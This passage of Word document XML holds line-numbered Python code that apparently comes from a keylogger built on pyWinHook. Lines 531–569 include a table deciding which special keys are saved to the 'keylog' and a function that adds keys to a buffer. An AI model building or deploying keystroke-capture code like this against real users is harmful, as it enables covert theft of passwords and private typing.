          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">531  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="878"/>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879" w:name="l532"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">532  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="879"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="880" w:name="l533"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">533  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="880"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">key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enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="881" w:name="l534"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">534  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="881"/>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882" w:name="l535"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">535  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="882"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="883" w:name="l536"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">536  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="88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Key previous {} | Current key {}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>key_previous</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>ckey</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="884" w:name="l537"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">537  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="884"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="885" w:name="l538"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">538  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="88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886" w:name="l539"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">539  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="886"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">key_previous </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="887" w:name="l540"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">540  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="887"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="888" w:name="l541"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">541  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="888"/>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889" w:name="l542"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">542  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="889"/>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890" w:name="l543"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">543  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="890"/>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891" w:name="l544"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">544  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="891"/>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892" w:name="l545"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">545  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="892"/>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893" w:name="l546"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">546  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="893"/>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894" w:name="l547"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">547  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="894"/>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95" w:name="l548"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">548  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="895"/>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896" w:name="l549"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">549  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="896"/>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897" w:name="l550"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">550  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="897"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="898" w:name="l551"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">551  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="898"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Exit control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="899" w:name="l552"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">552  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="899"/>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900" w:name="l553"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">553  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="900"/>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901" w:name="l554"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">554  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="90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02" w:name="l555"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">555  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="902"/>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903" w:name="l556"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">556  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="903"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="904" w:name="l557"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">557  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="904"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="905" w:name="l558"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">558  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="905"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># pyWinHook | Returns if a special key can be saved to the keylog</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="906" w:name="l559"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">559  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="906"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">de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07" w:name="l560"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">560  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="907"/>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08" w:name="l561"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">561  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="908"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'TAB'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>: True</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'LSHIFT'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>: False</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'RSHIFT'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>: False</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'CAPITAL'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>: False</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'LCONTROL'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>: True</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'RCONTROL'</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09" w:name="l562"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">562  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="909"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'LMENU'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>: True</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'RMENU'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>: True</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'LWIN'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>: False</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'RETURN'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>: True</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'BACK'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>: True</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'DELETE'</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10" w:name="l563"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">563  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="910"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'HOME'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>: True</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'END'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>: True</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'PRIOR'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>: True</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'NEXT'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>: True</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'ESCAPE'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>: True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="911" w:name="l564"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">564  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="911"/>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12" w:name="l565"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">565  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="912"/>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913" w:name="l566"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">566  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="913"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="914" w:name="l567"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">567  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="914"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="915" w:name="l568"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">568  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="915"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># pyWinHook | Adds key to buffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="916" w:name="l569"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">569  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="916"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
